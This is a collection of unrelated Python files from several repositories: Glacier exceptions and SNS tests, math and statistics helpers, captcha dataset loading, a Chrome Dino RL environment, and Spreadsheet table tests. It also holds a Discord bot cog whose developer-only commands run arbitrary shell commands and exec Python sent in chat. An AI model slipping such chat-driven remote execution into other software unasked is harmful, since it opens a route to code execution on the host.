(len(self.cause), "" if len(self.cause) == 1 else "s"))
for causePart in self.cause:
if hasattr(causePart,"causeTree"):
for line in causePart.causeTree(indentation, self.stack):
yield re.sub(r'([^\n]*\n)', indentation + r'\1', line)
else:
for line in traceback.format_exception_only(causePart.__class__, causePart):
yield re.sub(r'([^\n]*\n)', indentation + r'\1', line)
if not message and not stack:
yield ('No output. Specify message=True and/or stack=True \
to get output when calling this function.\n')
def write(self, stream=None, indentation=' ', message=False, stack=False):
"""
Writes the error details to sys.stderr or a stream.
"""
stream = sys.stderr if stream is None else stream
for line in self.causeTree(indentation, message=message, stack=stack):
stream.write(line)
def fetch(self, indentation=' ', message=False, stack=False):
"""
Fetches the error details and returns them as string.
"""
out = ''
for line in self.causeTree(indentation, message=message, stack=stack):
out += line
return out
class InputException(GlacierException):
"""
Exception that is raised when there is something wrong with the
user input.
"""
VaultNameError = 1
VaultDescriptionError = 2
def __init__(self, message, code=None, cause=None):
""" Handles the exception.
:param message: the error message.
:type message: str
:param code: the error code.
:type code:
:param cause: explanation on what caused the error.
:type cause: str
"""
GlacierException.__init__(self, message, code=code, cause=cause)
class ConnectionException(GlacierException):
"""
Exception that is raised when there is something wrong with
the connection.
"""
GlacierConnectionError = 1
SdbConnectionError = 2
def __init__(self, message, code=None, cause=None):
""" Handles the exception.
:param message: the error message.
:type message: str
:param code: the error code.
:type code:
:param cause: explanation on what caused the error.
:type cause: str
"""
GlacierException.__init__(self, message, code=code, cause=cause)
class CommunicationException(GlacierException):
"""
Exception that is raised when there is something wrong in
the communication with an external library like boto.
"""
def __init__(self, message, code=None, cause=None):
""" Handles the exception.
:param message: the error message.
:type message: str
:param code: the error code.
:type code:
:param cause: explanation on what caused the error.
:type cause: str
"""
GlacierException.__init__(self, message, code=code, cause=cause)
class ResponseException(GlacierException):
"""
Exception that is raised when there is an http response error.
"""
def __init__(self, message, code=None, cause=None):
GlacierException.__init__(self, message, code=code, cause=cause)
if __name__ == '__main__':
class ChildrenException(Exception):
def __init__(self, message):
Exception.__init__(self, message)
class ParentException(GlacierException):
def __init__(self, message, cause=None):
if cause:
GlacierException.__init__(self, message, cause=cause)
else:
GlacierException.__init__(self, message)
try:
try:
raise ChildrenException("parent")
except ChildrenException, e:
raise ParentException("children", cause=e)
except ParentException, e:
e.write(indentation='|| ')
```
#### File: glacier/tests/sns.py
```python
import unittest
import ConfigParser
import os
import sys
sys.path.append("/".join(sys.path[0].split("/")[:-1]))
from GlacierWrapper import GlacierWrapper
from boto.glacier.exceptions import UnexpectedHTTPResponseError
import localsettings
class TestGlacierSNS(unittest.TestCase):
def setUp(self):
config = ConfigParser.SafeConfigParser()
config.read(['/etc/glacier-cmd.conf',
os.path.expanduser('~/.glacier-cmd')])
secs = config.sections()
for sec in secs:
if sec != "aws":
config.remove_section(sec)
prepend_options = lambda section: [(section + "_" + k, v)
for k, v in config.items(section)]
self.args = dict(prepend_options("aws"))
self.args.update({"region": "us-east-1"})
def tearDown(self):
for vault in self.gw.lsvault():
if \
vault[u'VaultARN'].split("vaults/")[-1]\
.startswith("test_vvault"):
self.gw.rmvault(vault[u'VaultARN'].split("vaults/")[-1])
topics = self.gw.sns_conn.get_all_topics()\
['ListTopicsResponse']\
['ListTopicsResult']\
['Topics']
for topic in topics:
if topic['TopicArn'].split(":")[-1].startswith("test_topic"):
self.gw.sns_conn.delete_topic(topic['TopicArn'])
class TestGlacierSNSAuto(TestGlacierSNS):
def test_sync_auto_basic(self):
"""
No configuration
"""
sns_options = {'topic': 'aws-glacier-notifications',
'topics_present': False}
self.gw = GlacierWrapper(**self.args)
vault_name = "test_vvault0"
# Lets create one vault for our testing purposes
self.gw.mkvault(vault_name)
# Only after a call to one of gw functions was executed
# is glacierconn available
gc = vars(self.gw)['glacierconn']
# No vault notifications set for fresh vault
with self.assertRaises(UnexpectedHTTPResponseError) as cm:
gc.get_vault_notifications(vault_name)
self.assertEqual(cm.exception.status, 404)
self.assertEqual(cm.exception.message,
("Expected 200, got (404, "
"code=ResourceNotFoundException, "
"message=No notification configuration "
"is set for vault: %s)") % (vault_name,))
# Set all vaults
response = self.gw.sns_sync(sns_options=sns_options, output="csv")
successful_vaults = [r["Vault Name"] for r in response]
self.assertIn(vault_name, successful_vaults)
# Check out vault has set notifications
vaults = [vault[u'VaultARN'].split("vaults/")[-1]
for vault in self.gw.lsvault()]
for vault in vaults:
response = gc.get_vault_notifications(vault)
events = response['Events']
self.assertIn(u"ArchiveRetrievalCompleted", events)
self.assertIn(u"InventoryRetrievalCompleted", events)
# Remove test vault
self.gw.rmvault(vault_name)
class TestGlacierSNSMultiConfig(TestGlacierSNS):
def test_withOUT_method(self):
"""
Configuration
[SNS:test_topic_1]
[SNS:test_topic_2]
vaults=test_vvault0,test_vvault2
{'topics': [
"""
vaults = ['test_vvault0', 'test_vvault1', 'test_vvault2']
vaults_used = [vaults[0], vaults[2]]
sns_options = {'topics': [
{'topic': 'test_topic_1', 'options':{}},
{'topic': 'test_topic_2', 'options':
{'vaults': ','.join(vaults_used)}}
],
'topics_present': True}
self.gw = GlacierWrapper(**self.args)
for vault in vaults:
self.gw.mkvault(vault)
response = self.gw.sns_sync(sns_options=sns_options, output="csv")
for obj in response:
del obj['Request Id']
# Testing topic 1 - no vaults passed in,
# should be subscribed to all vaults (our testing vaults and some more)
for vault in vaults:
self.assertIn(
dict([('Topic', 'test_topic_1'),
('Subscribe Result', u''),
('Vault Name', vault)]),
response)
# Testing topic 2
# should be subscribed only to test_vvault0, test_vvault2
for vault in vaults_used:
self.assertIn(
dict([('Topic', 'test_topic_2'),
('Subscribe Result', u''),
('Vault Name', vault)]),
response)
for vault in vaults:
self.gw.rmvault(vault)
def test_with_method(self):
"""
Configuration
[SNS:test_topic_1]
method=email,<EMAIL>;
[SNS:test_topic_2]
vaults=test_vvault0,test_vvault2
method=email,<EMAIL>;email,<EMAIL>
"""
vaults = ['test_vvault0', 'test_vvault1', 'test_vvault2']
vaults_used = [vaults[0], vaults[2]]
sns_options = {'topics': [
{'topic': 'test_topic_1', 'options':
{'method': '%s,%s;' % (
localsettings.protocol_1,
localsettings.endpoint_1
)}},
{'topic': 'test_topic_2', 'options':
{'vaults': 'test_vvault0,test_vvault2',
'method': ('%s,%s;'
'%s,%s') % (
localsettings.protocol_1,
localsettings.endpoint_1,
localsettings.protocol_2,
localsettings.endpoint_2)}}
],
'topics_present': True}
self.gw = GlacierWrapper(**self.args)
for vault in vaults:
self.gw.mkvault(vault)
response = self.gw.sns_sync(sns_options=sns_options, output="csv")
for obj in response:
del obj['Request Id']
# Testing topic 1 - no vaults passed in,
# should be subscribed to all vaults (our testing vaults and some more)
for vault in vaults:
self.assertIn(
dict([('Topic', 'test_topic_1'),
('Subscribe Result', u'pending confirmation'),
('Vault Name', vault)]),
response)
# Testing topic 2
# should be subscribed only to test_vvault0, test_vvault2
for vault in vaults_used:
self.assertIn(
dict([('Topic', 'test_topic_2'),
('Subscribe Result', u'pending confirmation'),
('Vault Name', vault)]),
response)
for vault in vaults:
self.gw.rmvault(vault)
class TestGlacierSNSManualSubscribe(TestGlacierSNS):
def test_subscribe_to_existing_topic(self):
"""
$ glacier-cmd subscribe email endpoint_1 test_topic_1
"""
self.gw = GlacierWrapper(**self.args)
topic = 'test_topic_existing_kind_off'
# sns_subscribe actually creates a topic to "get it"
response = self.gw.sns_subscribe(protocol="email",
endpoint=localsettings.endpoint_1,
topic=topic,
sns_options={})
for res in response:
del res["RequestId"]
self.assertIn(
{'SubscribeResult': u'pending confirmation'},
response)
all_topics = self.gw.sns_conn.get_all_topics()\
['ListTopicsResponse']\
['ListTopicsResult']\
['Topics']
topics = [t['TopicArn'].split(":")[-1] for t in all_topics]
self.assertIn(topic, topics)
def test_subscribe_create_topic_for_vaults(self):
"""
$ glacier-cmd
subscribe email endpoint_1 test_topic --vault test_vvault0,test_vvault
"""
self.gw = GlacierWrapper(**self.args)
vaults = ['test_vvault0', 'test_vvault1', 'test_vvault2']
vaults_used = [vaults[0], vaults[2]]
topic = 'test_topic_new_for_vaults'
for vault in vaults:
self.gw.mkvault(vault)
response = self.gw.sns_subscribe(protocol="email",
endpoint=localsettings.endpoint_1,
topic=topic,
vault_names=",".join(vaults_used),
sns_options={})
for res in response:
del res["RequestId"]
self.assertIn(
{'SubscribeResult': u'pending confirmation'},
response)
# Lets check that the topic was created
all_topics = self.gw.sns_conn.get_all_topics()\
['ListTopicsResponse']\
['ListTopicsResult']\
['Topics']
topics = [t['TopicArn'].split(":")[-1] for t in all_topics]
self.assertIn(topic, topics)
for vault in vaults_used:
notifications = self.gw.glacierconn.get_vault_notifications(vault)
self.assertIn("ArchiveRetrievalCompleted",
notifications['Events'])
self.assertIn("InventoryRetrievalCompleted",
notifications['Events'])
self.assertEqual(topic,
notifications['SNSTopic'].split(":")[-1])
if __name__ == '__main__':
# Use python -m unittest tests_sns.<test case> to run individual test cases
# e. g. python -m unittest tests_sns.TestGlacierSNSManualSubscribe
unittest.main()
```
|
{
"source": "Jeff-Andrade/math-experiments",
"score": 4
}
|
#### File: math-experiments/Mathematics/Combinations.py
```python
from math import factorial
from random import choice
# Stores every permutation generated so far; a newly sampled permutation is kept only if it is not already in this list
globalPermutations = []
def sampler(data):
# Stores the permutation generated by one iteration of the sampler function if it is valid permutation
localPermutation = []
# Creates a copy of the input data, which will be altered through the execution of the function
sampleData = data[:]
# Makes sure that the function will generate a permutation of the same size of the original input data
while len(localPermutation) < len(data):
# Chooses a random element from the copy of the data
sampledElement = choice(sampleData)
# When an element is chosen, it will be removed from the copy, ensuring that a new element is always picked
sampleData.remove(sampledElement)
# Adds the chosen element to the local permutation list
localPermutation.append(sampledElement)
# If this permutation has already been generated before, discard it and sample again
if localPermutation in globalPermutations:
return sampler(data)
# After a valid permutation has been generated, it is added to the global permutation list
globalPermutations.append(localPermutation)
print(localPermutation)
def combinations(data):
# The sampler function is executed once for every possible permutation of the list, i.e. factorial(len(data)) times
for i in range(factorial(len(data))):
sampler(data)
```
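A minimal usage sketch for the two functions above; the input list is invented for illustration.
```python
# Prints each of the 3! = 6 orderings of the list exactly once, in random order
if __name__ == '__main__':
    combinations(['a', 'b', 'c'])
```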
#### File: Statistics/Frequency Table/Frequency Table.py
```python
import pandas as pd
import math
class FrequencyTable:
def __init__(self, data, include_stats):
def generate_table_info(data):
classAmount = round(1 + 3.3 * math.log(len(data), 10))
classAmplitude = (max(data) - min(data))/classAmount
minValue = min(data)
maxValue = max(data)
return [classAmount, classAmplitude, minValue, maxValue]
self.data = data
self.include_stats = include_stats
self.info = generate_table_info(self.data)
self.classAmount = self.info[0]
self.classAmplitude = self.info[1]
self.minValue = self.info[2]
self.maxValue = self.info[3]
self.classLines = []
def generate_interval(self):
currentValue = self.minValue
for intervals in range(self.classAmount):
self.classLines.append(
[currentValue, currentValue + self.classAmplitude, 0, 0])
currentValue += self.classAmplitude
def generate_frequencies(self):
for numbers in range(len(self.data)):
for intervals in range(len(self.classLines)):
if self.data[numbers] >= self.classLines[intervals][0] and self.data[numbers] < self.classLines[intervals][1]:
self.classLines[intervals][2] += 1
elif self.data[numbers] == self.maxValue and self.data[numbers] == self.classLines[intervals][1]:
self.classLines[intervals][2] += 1
for intervals in range(len(self.classLines)):
self.classLines[intervals][3] = (
round(self.classLines[intervals][2]/len(self.data), 3))*100
def generate_stats(self):
def calculate_mean():
mean = round(sum(self.data)/len(self.data), 3)
return mean
def calculate_median():
self.data.sort()
if len(self.data) % 2 == 0:
median = (self.data[len(self.data)//2] +
self.data[(len(self.data)//2) - 1])/2
else:
median = self.data[len(self.data)//2]
return median
def calculate_stdev():
summation = 0
for samples in range(len(self.data)):
summation += (self.data[samples] - calculate_mean())**2
result = round(math.sqrt((summation/(len(self.data) - 1))), 3)
return result
return [calculate_mean(), calculate_median(), calculate_stdev()]
def get_output(self):
def get_table():
dfFrequency = pd.DataFrame(data=self.classLines)
dfFrequency[0] = dfFrequency[0].round(3)
dfFrequency[1] = dfFrequency[1].round(3)
dfFrequency.columns = ["Lower Bound", "Upper Bound",
"Absolute Frequency", "Relative Frequency (%)"]
dfFrequency.index = range(1, len(dfFrequency.index) + 1)
return dfFrequency
def get_stats_table():
dfStats = pd.DataFrame(data=self.generate_stats())
dfStats = dfStats.transpose()
dfStats[0] = dfStats[0].round(3)
dfStats[1] = dfStats[1].round(3)
dfStats[2] = dfStats[2].round(3)
dfStats.columns = ["Mean", "Median",
"Standard Deviation"]
dfStats.index = [1]
return dfStats
if self.include_stats == True:
return [get_table(), get_stats_table()]
else:
return [get_table()]
def run(self):
if len(self.classLines) == 0:
self.generate_interval()
self.generate_frequencies()
return self.get_output()
else:
return self.get_output()
```
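A short usage sketch for the FrequencyTable class above; the sample values are made up for illustration.
```python
if __name__ == '__main__':
    samples = [12.1, 13.4, 15.0, 15.2, 16.8, 17.3, 18.9, 20.4, 21.0, 22.7]
    frequency_df, stats_df = FrequencyTable(samples, include_stats=True).run()
    print(frequency_df)
    print(stats_df)
```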
|
{
"source": "jeffarjeffar/Chess_Bot",
"score": 2
}
|
#### File: Chess_Bot/cogs/Development.py
```python
import discord
from discord.ext import commands
import os
import sys
import time
import pickle
import typing
import io
import textwrap
import traceback
from contextlib import redirect_stdout
import Chess_Bot.util.Utility as util
from Chess_Bot.util.CPP_IO import *
def is_developer():
def predicate(ctx):
return ctx.message.author.id in constants.DEVELOPERS
return commands.check(predicate)
class Development(commands.Cog):
def __init__(self, client):
self.client = client
self._last_result = None
@commands.command(hidden=True)
@commands.cooldown(1, 15, commands.BucketType.user)
@is_developer()
async def update(self, ctx):
await util.run('make clear')
out, err, status = await util.run('make')
message = f'Updated\nCompile Message: {out}\nStderr: {err}'
if len(message) >= 2000:
f = open(os.path.join(constants.TEMP_DIR, 'message.txt'), 'w')
f.write(message)
f.close()
await ctx.send(file=discord.File(os.path.join(constants.TEMP_DIR, 'message.txt')))
else:
await ctx.send(message)
await ctx.send(status)
@commands.command(hidden=True)
@is_developer()
async def shell(self, ctx, *, cmd):
await ctx.send(f'Executing command "{cmd}"...')
stdout, stderr, status = await util.run(cmd)
message = f'Stdout: {stdout}\nStderr: {stderr}'
if len(message) >= 2000:
f = open(os.path.join(constants.TEMP_DIR, 'message.txt'), 'w')
f.write(message)
f.close()
await ctx.send(file=discord.File(os.path.join(constants.TEMP_DIR, 'message.txt')))
else:
await ctx.send(message)
await ctx.send(status)
@commands.command(hidden=True)
@commands.cooldown(1, 15, commands.BucketType.user)
@is_developer()
async def restart(self, ctx):
await ctx.send(f'Restarting...')
sys.exit()
@commands.command(hidden=True)
@is_developer()
async def git_pull(self, ctx):
await ctx.send(f'Executing command "git pull"...')
stdout, stderr, status = await util.run(f'git pull')
message = f'```\nStdout:\n{stdout}Stderr: {stderr}```'
if len(message) >= 2000:
f = open(os.path.join(constants.TEMP_DIR, 'message.txt'), 'w')
f.write(message)
f.close()
await ctx.send(file=discord.File(os.path.join(constants.TEMP_DIR, 'message.txt')))
else:
await ctx.send(message)
await ctx.send(status)
def cleanup_code(self, content):
"""Automatically removes code blocks from the code."""
# remove ```py\n```
if content.startswith('```') and content.endswith('```'):
return '\n'.join(content.split('\n')[1:-1])
# remove `foo`
return content.strip('` \n')
@commands.command(pass_context=True, hidden=True)
@is_developer()
async def debug(self, ctx, *, body: str):
"""Evaluates a code"""
env = {
'bot': self.client,
'ctx': ctx,
'channel': ctx.channel,
'author': ctx.author,
'guild': ctx.guild,
'message': ctx.message,
'_': self._last_result
}
env.update(globals())
body = self.cleanup_code(body)
stdout = io.StringIO()
to_compile = f'async def func():\n{textwrap.indent(body, " ")}'
try:
exec(to_compile, env)
except Exception as e:
return await ctx.send(f'```py\n{e.__class__.__name__}: {e}\n```')
func = env['func']
try:
with redirect_stdout(stdout):
ret = await func()
except Exception as e:
value = stdout.getvalue()
await ctx.send(f'```py\n{value}{traceback.format_exc()}\n```')
else:
value = stdout.getvalue()
try:
await ctx.message.add_reaction('\u2705')
except:
pass
if ret is None:
if value:
await ctx.send(f'```py\n{value}\n```')
else:
self._last_result = ret
await ctx.send(f'```py\n{value}{ret}\n```')
@commands.command(hidden=True)
@is_developer()
async def gimme(self, ctx, file):
await ctx.send(file, file=discord.File(file))
def setup(bot):
bot.add_cog(Development(bot))
```
|
{
"source": "jeffasante/captcha",
"score": 3
}
|
#### File: jeffasante/captcha/utils.py
```python
import torch
from torch.utils.data import Dataset
from torchvision import transforms, datasets
import numpy as np
import zipfile
from io import open
import glob
from PIL import Image, ImageOps
import os
import string
# Read data
def extractZipFiles(zip_file, extract_to):
''' Extract from zip '''
with zipfile.ZipFile(zip_file, 'r')as zipped_ref:
zipped_ref.extractall(extract_to)
print('done')
data_dir = 'data/captcha_images_v2/*.png'
def findFiles(path): return glob.glob(path)
# Alphabet used to encode the captcha labels (assumption: lowercase letters plus digits)
all_letters = string.ascii_lowercase + string.digits
# find letter index in all_letters
def letterToIndex(letter):
return all_letters.find(letter)
# print(letterToIndex('l'))
# index to letter
indexToLetter = {letterToIndex(i):i for i in all_letters}
data = [img for img in findFiles(data_dir)]
targets = [os.path.basename(x)[:-4] for x in glob.glob(data_dir)]
# abcde -> [a, b, c, d, e]
pre_targets_flat = [[c for c in x] for x in targets]
encoded_targets = np.array([[letterToIndex(c) for c in x] for x in pre_targets_flat])
targets_flat = [char for word in pre_targets_flat for char in word]
unique_letters = set(char for word in targets for char in word)
class CaptchaDataset(Dataset):
"""
Args:
data (string): Path to the file with all the images.
target (string): Path to the file with annotations.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
def __init__(self, data, target=None, transform=None):
self.data = data
self.target = target
self.transform = transform
def __getitem__(self, index):
# read image
x = Image.open(self.data[index]).convert('RGB')
y = self.target[index]
# resize, turn to 0,1
if self.transform:
x = self.transform(x)
return x, torch.tensor(y, dtype=torch.long)
return x, y
def __len__(self):
return len(self.data)
```
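A minimal loading sketch for CaptchaDataset, reusing the module-level data and encoded_targets defined above; it assumes torch/torchvision are installed and the PNGs referenced by data_dir exist, and the resize dimensions are an assumption, not taken from this repository.
```python
from torch.utils.data import DataLoader

if __name__ == '__main__':
    transform = transforms.Compose([
        transforms.Resize((50, 200)),  # assumed target size, adjust to the model used
        transforms.ToTensor(),
    ])
    dataset = CaptchaDataset(data, encoded_targets, transform=transform)
    loader = DataLoader(dataset, batch_size=8, shuffle=True)
    images, labels = next(iter(loader))
    print(images.shape, labels.shape)
```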
|
{
"source": "jeffasante/chrome-dino-RL",
"score": 3
}
|
#### File: chrome-dino-RL/utils/extract.py
```python
import torchvision.transforms as T
import torch
from PIL import Image
import numpy as np
'''Input Extraction'''
def get_dino_location(screen_height, screen_width):
world = screen_height * screen_width
scale = screen_width / world
return int(screen_height * scale + screen_width / 2.0)
resize = T.Compose([T.ToPILImage(),
T.Resize((80,80,), interpolation=Image.CUBIC),
T.ToTensor()])
def get_screen(env):
screen = env.render(mode='rgb_array').transpose((2, 0, 1))
_, screen_height, screen_width = screen.shape
# strip off the top and bottom of the screen
screen = screen[:, int(screen_height*0.2):int(screen_height*0.5), :]
dino_loc = get_dino_location(screen_height, screen_width)
screen = screen[:, :dino_loc, :]
screen = np.ascontiguousarray(screen, dtype=np.float32) / 255.0
screen = torch.from_numpy(screen)
return resize(screen).unsqueeze(0)
```
#### File: chrome-dino-RL/utils/gym_dino_run.py
```python
import gym
from gym import spaces, error
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from pyvirtualdisplay import Display
import numpy as np
import os
import time
from io import BytesIO
from PIL import Image
import base64
import cv2
class GameInterface:
def __init__(self, game_url='chrome://dino',
chromedrive='./utils/chrome_driver/chromedriver.exe'):
'''Web Interface.'''
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--mute-audio')
self.driver = webdriver.Chrome(chromedrive,
chrome_options=chrome_options)
self.driver.set_window_position(x=-10, y=0)
try:
self.driver.get(game_url)
except:
print('Running offline..')
def press_up(self):
self.driver.find_element_by_tag_name("body").send_keys(Keys.ARROW_UP)
def press_down(self):
self.driver.find_element_by_tag_name("body").send_keys(Keys.ARROW_DOWN)
def press_space(self):
self.driver.find_element_by_tag_name("body").send_keys(Keys.SPACE)
def get_crashed(self):
return self.driver.execute_script("return Runner.instance_.crashed")
def pause(self):
return self.driver.execute_script("return Runner.instance_.stop()")
def resume(self):
return self.driver.execute_script("return Runner.instance_.play()")
def end(self):
self.driver.close()
class DinoRunEnv(gym.Env, GameInterface):
def __init__(self, screen_width=120, screen_height=120, headless=False):
gym.Env.__init__(self)
GameInterface.__init__(self, game_url='chrome://dino')
self.screen_width = screen_width
self.screen_height = screen_height
self.driver.execute_script("Runner.config.ACCELERATION=0")
init_script = "document.getElementsByClassName('runner-canvas')[0].id = 'runner-canvas'"
self.driver.execute_script(init_script)
# action_space and observation_space
self.action_space = spaces.Discrete(3) # do nothing, up, down
self.observation_space = spaces.Box(
low = 0,
high = 255,
shape = (self.screen_width, self.screen_height, 3),
dtype=np.uint8
)
self.viewer = None
self.actions_lookup = {0:lambda: None,
1:self.press_up,
2:self.press_down
}
# All graphical operations are performed in virtual memory without showing any screen output.
if headless:
display = Display(visible=0, size=(1024, 768))
display.start()
def step(self, action):
'''returns observaton, reward, done, extra_info'''
assert action in self.action_space
self.actions_lookup[action]()
obs = self._get_screen()
done, reward = (True, -1) if self._get_crashed() else (False, 0.1)
time.sleep(.015)
return obs, reward, done, {'score': self._get_score()}
def render(self, mode='human'):
''' Return image array '''
image = cv2.cvtColor(self._get_screen(), cv2.COLOR_BGR2RGB)
if mode == 'rgb_array':
return image
elif mode =='human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(image)
return self.viewer.isopen
def reset(self):
self.driver.execute_script("Runner.instance_.restart()")
self.step(1)
time.sleep(2)
return self._get_screen()
def close(self):
if self.viewer is not None:
self.viewer.close()
self.viewer = None
def _get_screen(self):
image = self.driver.get_screenshot_as_base64()
return np.array(Image.open(BytesIO(base64.b64decode(image))))
def _get_score(self):
return int(''.join \
(self.driver.execute_script("return Runner.instance_.distanceMeter.digits")))
def _get_crashed(self):
return self.driver.execute_script("return Runner.instance_.crashed")
```
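A minimal interaction sketch for DinoRunEnv, assuming Chrome and a matching chromedriver are available at the path used above; the random policy is only for illustration.
```python
if __name__ == '__main__':
    env = DinoRunEnv()
    obs = env.reset()
    done, total_reward = False, 0.0
    while not done:
        action = env.action_space.sample()  # random policy, illustration only
        obs, reward, done, info = env.step(action)
        total_reward += reward
    print('score:', info['score'], 'total reward:', total_reward)
    env.end()
```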
|
{
"source": "jeffa/Spreadsheet-HTML-python",
"score": 3
}
|
#### File: Spreadsheet-HTML-python/t/06-aliases.py
```python
import unittest
from Spreadsheet.HTML import Table
class TestAliases(unittest.TestCase):
def test_portrait(self):
data = [
['header1', 'header2', 'header3', 'header4'],
['foo1', 'bar1', 'baz1', 'qux1'],
['foo2', 'bar2', 'baz2', 'qux2'],
['foo3', 'bar3', 'baz3', 'qux3'],
['foo4', 'bar4', 'baz4', 'qux4']
]
html = '<table><tr><th>header1</th><th>header2</th><th>header3</th><th>header4</th></tr><tr><td>foo1</td><td>bar1</td><td>baz1</td><td>qux1</td></tr><tr><td>foo2</td><td>bar2</td><td>baz2</td><td>qux2</td></tr><tr><td>foo3</td><td>bar3</td><td>baz3</td><td>qux3</td></tr><tr><td>foo4</td><td>bar4</td><td>baz4</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data } ).portrait(),
"via constructor and method"
)
self.assertEqual(
html,
Table().portrait( data ),
"with array ref"
)
self.assertEqual(
html,
Table().portrait( { 'data': data } ),
"named args only"
)
self.assertEqual(
html,
Table( { 'data': data, 'theta': 90 } ).portrait(),
"theta disabled via constructor and method"
)
self.assertEqual(
html,
Table().portrait( data, 'theta', 180 ),
"theta disabled with array ref"
)
self.assertEqual(
html,
Table().portrait( { 'data': data, 'theta': 270 } ),
"theta disabled named args only"
)
html = '<table><tr><td>header1</td><td>header2</td><td>header3</td><td>header4</td></tr><tr><td>foo1</td><td>bar1</td><td>baz1</td><td>qux1</td></tr><tr><td>foo2</td><td>bar2</td><td>baz2</td><td>qux2</td></tr><tr><td>foo3</td><td>bar3</td><td>baz3</td><td>qux3</td></tr><tr><td>foo4</td><td>bar4</td><td>baz4</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data, 'matrix': 1 } ).portrait(),
"matrix via constructor and method"
)
self.assertEqual(
html,
Table().portrait( data, 'matrix', 1 ),
"matrix with array ref"
)
self.assertEqual(
html,
Table().portrait( { 'data': data, 'matrix': 1 } ),
"matrix named args only"
)
html = '<table><tr><td>foo1</td><td>bar1</td><td>baz1</td><td>qux1</td></tr><tr><td>foo2</td><td>bar2</td><td>baz2</td><td>qux2</td></tr><tr><td>foo3</td><td>bar3</td><td>baz3</td><td>qux3</td></tr><tr><td>foo4</td><td>bar4</td><td>baz4</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data, 'headless': 1 } ).portrait(),
"headless via constructor and method"
)
self.assertEqual(
html,
Table().portrait( data, 'headless', 1 ),
"headless with array ref"
)
self.assertEqual(
html,
Table().portrait( { 'data': data, 'headless': 1 } ),
"headless named args only"
)
def test_landscape(self):
data = [
['header1', 'header2', 'header3', 'header4'],
['foo1', 'bar1', 'baz1', 'qux1'],
['foo2', 'bar2', 'baz2', 'qux2'],
['foo3', 'bar3', 'baz3', 'qux3'],
['foo4', 'bar4', 'baz4', 'qux4']
]
html = '<table><tr><th>header1</th><td>foo1</td><td>foo2</td><td>foo3</td><td>foo4</td></tr><tr><th>header2</th><td>bar1</td><td>bar2</td><td>bar3</td><td>bar4</td></tr><tr><th>header3</th><td>baz1</td><td>baz2</td><td>baz3</td><td>baz4</td></tr><tr><th>header4</th><td>qux1</td><td>qux2</td><td>qux3</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data } ).landscape(),
"via constructor and method"
)
self.assertEqual(
html,
Table().landscape( data ),
"with array ref"
)
self.assertEqual(
html,
Table().landscape( { 'data': data } ),
"named args only"
)
self.assertEqual(
html,
Table( { 'data': data, 'theta': 90 } ).landscape(),
"theta disabled via constructor and method"
)
self.assertEqual(
html,
Table().landscape( data, 'theta', 180 ),
"theta disabled with array ref"
)
self.assertEqual(
html,
Table().landscape( { 'data': data, 'theta': 270 } ),
"theta disabled named args only"
)
html = '<table><tr><td>header1</td><td>foo1</td><td>foo2</td><td>foo3</td><td>foo4</td></tr><tr><td>header2</td><td>bar1</td><td>bar2</td><td>bar3</td><td>bar4</td></tr><tr><td>header3</td><td>baz1</td><td>baz2</td><td>baz3</td><td>baz4</td></tr><tr><td>header4</td><td>qux1</td><td>qux2</td><td>qux3</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data, 'matrix': 1 } ).landscape(),
"matrix via constructor and method"
)
self.assertEqual(
html,
Table().landscape( data, 'matrix', 1 ),
"matrix with array ref"
)
self.assertEqual(
html,
Table().landscape( { 'data': data, 'matrix': 1 } ),
"matrix named args only"
)
html = '<table><tr><td>foo1</td><td>foo2</td><td>foo3</td><td>foo4</td></tr><tr><td>bar1</td><td>bar2</td><td>bar3</td><td>bar4</td></tr><tr><td>baz1</td><td>baz2</td><td>baz3</td><td>baz4</td></tr><tr><td>qux1</td><td>qux2</td><td>qux3</td><td>qux4</td></tr></table>'
self.assertEqual(
html,
Table( { 'data': data, 'headless': 1 } ).landscape(),
"headless via constructor and method"
)
self.assertEqual(
html,
Table().landscape( data, 'headless', 1 ),
"headless with array ref"
)
self.assertEqual(
html,
Table().landscape( { 'data': data, 'headless': 1 } ),
"headless named args only"
)
def test_aliases(self):
data = [
['header1', 'header2', 'header3', 'header4'],
['foo1', 'bar1', 'baz1', 'qux1'],
['foo2', 'bar2', 'baz2', 'qux2'],
['foo3', 'bar3', 'baz3', 'qux3'],
['foo4', 'bar4', 'baz4', 'qux4']
]
self.assertEqual(
Table( { 'data': data } ).generate(),
Table( { 'data': data } ).portrait(),
"portrait is generate via constructor and method"
)
self.assertEqual(
Table().generate( data ),
Table().portrait( data ),
"portrait is generate with array ref"
)
self.assertEqual(
Table().generate( { 'data': data } ),
Table().portrait( { 'data': data } ),
"portrait is generate named args only"
)
self.assertEqual(
Table( { 'data': data } ).generate(),
Table( { 'data': data } ).north(),
"north is generate via constructor and method"
)
self.assertEqual(
Table().generate( data ),
Table().north( data ),
"north is generate with array ref"
)
self.assertEqual(
Table().generate( { 'data': data } ),
Table().north( { 'data': data } ),
"north is generate named args only"
)
self.assertEqual(
Table( { 'data': data } ).west(),
Table( { 'data': data } ).landscape(),
"west is landscape via constructor and method"
)
self.assertEqual(
Table().west( data ),
Table().landscape( data ),
"west is landscape with array ref"
)
self.assertEqual(
Table().west( { 'data': data } ),
Table().landscape( { 'data': data } ),
"west is landscape named args only"
)
self.assertEqual(
Table( { 'data': data } ).west(),
Table( { 'data': data, 'theta': -270 } ).generate(),
"west is theta -270 via constructor and method"
)
self.assertEqual(
Table().west( data ),
Table().generate( data, 'theta', -270 ),
"west is theta -270 with array ref"
)
self.assertEqual(
Table().west( { 'data': data } ),
Table().generate( { 'data': data, 'theta': -270 } ),
"west is theta -270 named args only"
)
self.assertEqual(
Table( { 'data': data } ).east(),
Table( { 'data': data, 'theta': 90, 'pinhead': 1 } ).generate(),
"east is theta 90 via constructor and method"
)
self.assertEqual(
Table().east( data ),
Table().generate( data, 'theta', 90, 'pinhead', 1 ),
"east is theta 90 with array ref"
)
self.assertEqual(
Table().east( { 'data': data } ),
Table().generate( { 'data': data, 'theta': 90, 'pinhead': 1 } ),
"east is theta 90 named args only"
)
